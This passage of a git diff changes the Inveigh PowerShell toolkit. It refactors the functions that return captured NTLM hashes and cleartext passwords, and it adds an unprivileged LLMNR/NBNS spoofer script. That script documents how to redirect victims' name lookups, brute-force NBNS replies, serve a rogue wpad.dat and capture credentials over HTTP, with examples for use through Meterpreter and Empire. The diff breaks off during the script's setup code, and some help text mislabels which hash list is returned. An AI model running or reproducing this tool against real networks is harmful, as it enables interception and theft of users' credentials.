$inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -1593,31 +1644,31 @@ if(!$inveigh.running -and $inveigh.console_output) Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -1647,114 +1698,163 @@ if(!$inveigh.running -and $inveigh.console_output) function Stop-Inveigh { - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + +if($inveigh) +{ - if($inveigh) + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + + if($inveigh.HTTP_listener.IsListening) { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) + { + $inveigh.unprivileged_running = $false + Start-Sleep -s 5 + Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null - if($inveigh.HTTP_listener.IsListening) + if($inveigh.file_output) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - } + } - if($inveigh.relay_running) + if($inveigh.relay_running) + { + $inveigh.relay_running = $false + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + + if($inveigh.file_output) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + if($inveigh.running) + { + $inveigh.running = $false + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - if($inveigh.running) + if($inveigh.file_output) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append + } - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } + } - } + } + else + { + Write-Output("There are no running Inveigh functions") + } + + if($inveigh.HTTPS) + { + & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - } - else + try { - Write-Output("There are no running Inveigh functions") + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() } - - if($inveigh.HTTPS) + catch { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + Write-Output("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - try + if($inveigh.file_output) { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null } + $inveigh.HTTP = $false + $inveigh.HTTPS = $false +} +else +{ + Write-Output("There are no running Inveigh functions")|Out-Null +} + } function Get-Inveigh { - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Log +Get log entries. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($Console -or $PSBoundParameters.Count -eq 0) +{ while($inveigh.console_queue.Count -gt 0) { @@ -1762,7 +1862,7 @@ function Get-Inveigh if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -1770,12 +1870,6 @@ function Get-Inveigh switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - "* written to *" { @@ -1784,31 +1878,31 @@ function Get-Inveigh Write-Warning $inveigh.console_queue[0] } - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* for relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "*SMB relay *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } "* local administrator *" { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } default { Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } } @@ -1819,279 +1913,200 @@ function Get-Inveigh } -function Get-InveighCleartext +if($Log) { - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - + Write-Output $inveigh.log } -function Get-InveighNTLMv1 +if($NTLMv1) { - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } + Write-Output $inveigh.NTLMv1_list +} - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } +if($NTLMv1Unique) +{ + $inveigh.NTLMv1_list.Sort() - if($Unique) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - $inveigh.NTLMv1_list.Sort() + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account + Write-Output $unique_NTLMv1 } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list + + $unique_NTLMv1_account_last = $unique_NTLMv1_account } } -function Get-InveighNTLMv2 +if($NTLMv1Usernames) { - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. + Write-Output $inveigh.NTLMv2_username_list +} - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> +if($NTLMv2) +{ + Write-Output $inveigh.NTLMv2_list +} - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) +if($NTLMv2Unique) +{ + $inveigh.NTLMv2_list.Sort() - if($invalid_parameter) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - throw "$($invalid_parameter) is not a valid parameter." - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } - if($Unique) - { - $inveigh.NTLMv2_list.Sort() + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) +} - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } +if($NTLMv2Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } +if($Cleartext) +{ + Write-Output $inveigh.cleartext_list +} +if($CleartextUnique) +{ + Write-Output $inveigh.cleartext_list | Get-Unique } -function Get-InveighLog +if($Learning) { - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> + Write-Output $inveigh.valid_host_list +} - Write-Output $inveigh.log } function Watch-Inveigh { - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. +#> + +if($inveigh.tool -ne 1) +{ - if($inveigh.tool -ne 1) + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) { + Write-Output "Press any key to stop real time console output" + $inveigh.console_output = $true - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) + :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + while($inveigh.console_queue.Count -gt 0) { - while($inveigh.console_queue.Count -gt 0) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else { - if($inveigh.output_stream_only) + switch -wildcard ($inveigh.console_queue[0]) { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } + "* written to *" + { - "* for relay *" + if($inveigh.file_output) { Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) } - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + $inveigh.console_queue.RemoveAt(0) + } - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) } } - - } - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop } + + } - Start-Sleep -m 5 + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop } - } - else - { - Write-Output "Inveigh isn't running" + Start-Sleep -m 5 } } else { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" + Write-Output "Inveigh isn't running" } } +else +{ + Write-Output "Watch-Inveigh cannot be used with current external tool selection" +} + +} function Clear-Inveigh { - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } +if($inveigh) +{ + if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + +} }
\ No newline at end of file diff --git a/Scripts/Inveigh-Unprivileged.ps1 b/Scripts/Inveigh-Unprivileged.ps1 new file mode 100644 index 0000000..b4c0c25 --- /dev/null +++ b/Scripts/Inveigh-Unprivileged.ps1 @@ -0,0 +1,2364 @@ +function Invoke-InveighUnprivileged +{ +<# +.SYNOPSIS +Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP. This +version of Inveigh does not require local admin access. + +.DESCRIPTION +Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with the following features: + + Local admin is not required for any feature + IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service + IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled + Targeted IPv4 NBNS transaction ID brute force spoofer with granular control + NTLMv1/NTLMv2 challenge/response capture over HTTP + Basic auth cleartext credential capture over HTTP + WPAD server capable of hosting a basic or custom wpad.dat file + HTTP server capable of hosting limited content + Granular control of console and file output + Run time control + +This function contains only features that do not require local admin access. Note that there are caveats. A local +firewall can still prevent traffic from reaching this function's listeners. Also, if LLMNR is enabled on the host, +the LLMNR spoofer will not work. Both of these scenarios would still require local admin access to +change. + +.PARAMETER SpooferIP +IP address for the LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the Inveigh host. + +.PARAMETER SpooferHostsReply +Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferHostsIgnore +Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsReply +Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferIPsIgnore +Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. + +.PARAMETER SpooferRepeat +Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user +challenge/response has been captured. + +.PARAMETER LLMNR +Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. + +.PARAMETER LLMNRTTL +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. + +.PARAMETER NBNS +Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. + +.PARAMETER NBNSTTL +Default = 165 Seconds: NBNS TTL in seconds for the response packet. + +.PARAMETER NBNSBruteForce +Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. + +.PARAMETER NBNSBruteForceHost +Default = WPAD: Hostname for the NBNS Brute Force spoofer. + +.PARAMETER NBNSBruteForcePause +Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming +HTTP request is received. + +.PARAMETER NBNSBruteForceTarget +IP address to target for NBNS brute force spoofing. + +.PARAMETER HTTP +Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. + +.PARAMETER HTTPIP +Default = Any: IP address for the HTTP listener. + +.PARAMETER HTTPPort +Default = 80: TCP port for the HTTP listener. + +.PARAMETER HTTPAuth +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to +wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A +WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and +connecting to the root of the HTTP listener. + +.PARAMETER HTTPBasicRealm +Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. + +.PARAMETER HTTPResponse +String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +Use PowerShell character escapes where necessary. + +.PARAMETER WPADAuth +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. + +.PARAMETER WPADEmptyFile +Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. +Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when +using WPADIP, WPADPort, or WPADResponse. + +.PARAMETER WPADIP +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. + +.PARAMETER WPADPort +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. + +.PARAMETER WPADDirectHosts +Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the +defined proxy. Use PowerShell character escapes where necessary. + +.PARAMETER WPADResponse +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. + +.PARAMETER Challenge +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. This will only be used for non-relay captures. + +.PARAMETER MachineAccounts +Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. + +.PARAMETER ConsoleOutput +Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to +ensure that it doesn't hang the shell. + +.PARAMETER ConsoleStatus +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for +displaying full capture lists when running through a shell that does not have access to the support functions. + +.PARAMETER ConsoleUnique +Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time console output is enabled. + +.PARAMETER FileOutput +Default = Disabled: (Y/N) Enable/Disable real time file output. + +.PARAMETER FileUnique +Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time file output is enabled. + +.PARAMETER StatusOutput +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. + +.PARAMETER OutputStreamOnly +Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if +running Inveigh Unprivileged through a shell that does not return other output streams. Note that you will not see +the various yellow warning messages if enabled. + +.PARAMETER OutputDir +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be +enabled. + +.PARAMETER RunTime +Default = Unlimited: (Integer) Run time duration in minutes. + +.PARAMETER RunCount +Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. + +.PARAMETER ShowHelp +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. + +.PARAMETER Tool +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire + +.EXAMPLE +Import-Module .\Inveigh.psd1;Invoke-InveighUnprivileged -ConsoleOutput Y + +.EXAMPLE +Invoke-InveighUnprivileged -NBNSBruteForce Y -SpooferTarget 192.168.1.11 -Hostname server1 +Target 192.168.1.11 for 'server1' hostname spoofs. + +.EXAMPLE +Invoke-InveighUnprivileged -NBNSBruteForce Y -SpooferTarget 192.168.1.11 -WPADIP 192.168.10.10 -WPADPort 8080 +Target 192.168.1.11 for 'WPAD' hostname spoofs and respond to wpad.dat requests with a proxy of 192.168.10.10:8080. + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + +# Parameter default values can be modified in this section: +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", + [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", + [parameter(Mandatory=$false)][Int]$HTTPPort = "80", + [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "", + [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", + [parameter(Mandatory=$false)][Int]$WPADPort = "", + [parameter(Mandatory=$false)][Int]$RunCount = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", + [parameter(Mandatory=$false)][String]$HTTPResponse = "", + [parameter(Mandatory=$false)][String]$WPADResponse = "", + [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD", + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if ($invalid_parameter) +{ + throw "$($invalid_parameter) is not a valid parameter." +} + +if($NBNSBruteForce -eq 'Y') +{ + $NBNS = 'N' + $LLMNR = 'N' +} + +if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget) +{ + throw "You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce" +} + +if(!$SpooferIP) +{ + $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) +} + +if($WPADIP -or $WPADPort) +{ + + if(!$WPADIP) + { + throw "You must specify a -WPADPort to go with -WPADIP" + } + + if(!$WPADPort) + { + throw "You must specify a -WPADIP to go with -WPADPort" + } + +} + +if(!$OutputDir) +{ + $output_directory = $PWD.Path +} +else +{ + $output_directory = $OutputDir +} + +if(!$inveigh) +{ + $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.log = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList + $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList +} + +if($inveigh.unprivileged_running) +{ + throw "Invoke-InveighUnprivileged is already running, use Stop-Inveigh" +} + +if(!$inveigh.running -or !$inveigh.relay_running) +{ + $inveigh.console_queue = New-Object System.Collections.ArrayList + $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.log_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList + $inveigh.certificate_application_ID = $HTTPSCertAppID + $inveigh.certificate_thumbprint = $HTTPSCertThumbprint + $inveigh.console_output = $false + $inveigh.console_input = $true + $inveigh.file_output = $false + $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" + $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" + $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" +} + +$inveigh.hostname_spoof = $false +$inveigh.unprivileged_running = $true + +if($StatusOutput -eq 'Y') +{ + $inveigh.status_output = $true +} +else +{ + $inveigh.status_output = $false +} + +if($OutputStreamOnly -eq 'Y') +{ + $inveigh.output_stream_only = $true 